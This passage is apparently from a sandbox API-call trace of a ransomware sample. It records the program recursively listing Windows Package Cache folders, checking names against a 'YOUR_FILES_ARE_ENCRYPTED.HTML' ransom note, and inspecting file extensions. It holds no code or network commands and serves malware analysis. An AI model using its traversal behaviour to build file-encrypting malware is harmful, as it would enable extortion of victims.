ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xb06d36f3, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="..", cAlternateFileName="")) returned 1 [0110.457] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb06d36f3, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb06d36f3, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb06d83f9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.457] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", cAlternateFileName="{0FA68~1.285")) returned 1 [0110.457] StrStrIW (lpFirst="{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.457] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned 87 [0110.457] GetProcessHeap () returned 0x600000 [0110.457] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.458] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508" [0110.458] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*" [0110.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaf95b332, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.458] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaf95b332, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.458] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.458] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.458] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned 96 [0110.458] GetProcessHeap () returned 0x600000 [0110.458] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.459] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages" [0110.459] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*" [0110.459] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaf9516aa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4558, dwReserved1=0x6f44a8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.459] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaf9516aa, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4558, dwReserved1=0x6f44a8, cFileName="..", cAlternateFileName="")) returned 1 [0110.459] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xaf9760df, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf9760df, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f4558, dwReserved1=0x6f44a8, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0110.459] StrStrIW (lpFirst="vcRuntimeAdditional_x86", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.459] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned 120 [0110.459] GetProcessHeap () returned 0x600000 [0110.459] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.460] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86" [0110.460] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*" [0110.460] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xaf9760df, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf9760df, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63a4e8, dwReserved1=0x6f44b0, cFileName=".", cAlternateFileName="")) returned 0x626738 [0110.460] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6505595c, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xaf9760df, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf9760df, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63a4e8, dwReserved1=0x6f44b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.460] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b027600, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x1b027600, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0xafc60327, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x4f83ae, dwReserved0=0x63a4e8, dwReserved1=0x6f44b0, cFileName="cab1.cab.1F7353B686BB3874B7DCF70D397A2D391B0AE5183F7BA5D8C07C2DCDB0CACA2F", cAlternateFileName="CAB1CA~1.1F7")) returned 1 [0110.460] StrStrIW (lpFirst="cab1.cab.1F7353B686BB3874B7DCF70D397A2D391B0AE5183F7BA5D8C07C2DCDB0CACA2F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.460] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\cab1.cab.1F7353B686BB3874B7DCF70D397A2D391B0AE5183F7BA5D8C07C2DCDB0CACA2F") returned 194 [0110.460] PathFindExtensionW (pszPath="cab1.cab.1F7353B686BB3874B7DCF70D397A2D391B0AE5183F7BA5D8C07C2DCDB0CACA2F") returned=".1F7353B686BB3874B7DCF70D397A2D391B0AE5183F7BA5D8C07C2DCDB0CACA2F" [0110.460] lstrlenW (lpString=".1F7353B686BB3874B7DCF70D397A2D391B0AE5183F7BA5D8C07C2DCDB0CACA2F") returned 65 [0110.461] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4be2ab00, ftCreationTime.dwHighDateTime=0x1d5c5bb, ftLastAccessTime.dwLowDateTime=0x4be2ab00, ftLastAccessTime.dwHighDateTime=0x1d5c5bb, ftLastWriteTime.dwLowDateTime=0x4be2ab00, ftLastWriteTime.dwHighDateTime=0x1d5c5bb, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x63a4e8, dwReserved1=0x6f44b0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.461] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.461] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi") returned 149 [0110.461] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0110.461] lstrlenW (lpString=".msi") returned 4 [0110.461] PathFindExtensionW (pszPath="vc_runtimeAdditional_x86.msi") returned=".msi" [0110.461] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9418dc, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf9418dc, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf94b4fe, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63a4e8, dwReserved1=0x6f44b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.461] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9418dc, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf9418dc, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf94b4fe, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63a4e8, dwReserved1=0x6f44b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.461] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0110.461] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 150 [0110.461] GetProcessHeap () returned 0x600000 [0110.461] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\vcRuntimeAdditional_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\vcruntimeadditional_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.461] GetProcessHeap () returned 0x600000 [0110.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.461] GetProcessHeap () returned 0x600000 [0110.461] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.462] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9516aa, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf9516aa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf95537a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4558, dwReserved1=0x6f44a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.462] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9516aa, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf9516aa, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf95537a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f4558, dwReserved1=0x6f44a8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.462] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0110.462] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0110.462] GetProcessHeap () returned 0x600000 [0110.462] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.463] GetProcessHeap () returned 0x600000 [0110.463] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.463] GetProcessHeap () returned 0x600000 [0110.463] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.463] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf95a4a5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf95a4a5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf96012f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.463] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf95a4a5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf95a4a5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf96012f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.463] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.464] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0110.464] GetProcessHeap () returned 0x600000 [0110.464] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{0FA68574-690B-4B00-89AA-B28946231449}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{0fa68574-690b-4b00-89aa-b28946231449}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.464] GetProcessHeap () returned 0x600000 [0110.464] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.464] GetProcessHeap () returned 0x600000 [0110.464] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.465] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496a9699, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fd5cd, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x496fd5cd, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1 [0110.465] StrStrIW (lpFirst="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.465] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned 86 [0110.465] GetProcessHeap () returned 0x600000 [0110.465] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.466] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0110.466] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*" [0110.466] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496a9699, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fd5cd, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaf9fc5be, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.466] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496a9699, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fd5cd, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xaf9fc5be, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.467] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fd5cd, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x496fe967, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x496fe967, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.467] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.467] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned 95 [0110.467] GetProcessHeap () returned 0x600000 [0110.467] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.467] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0110.467] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*" [0110.467] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496fd5cd, 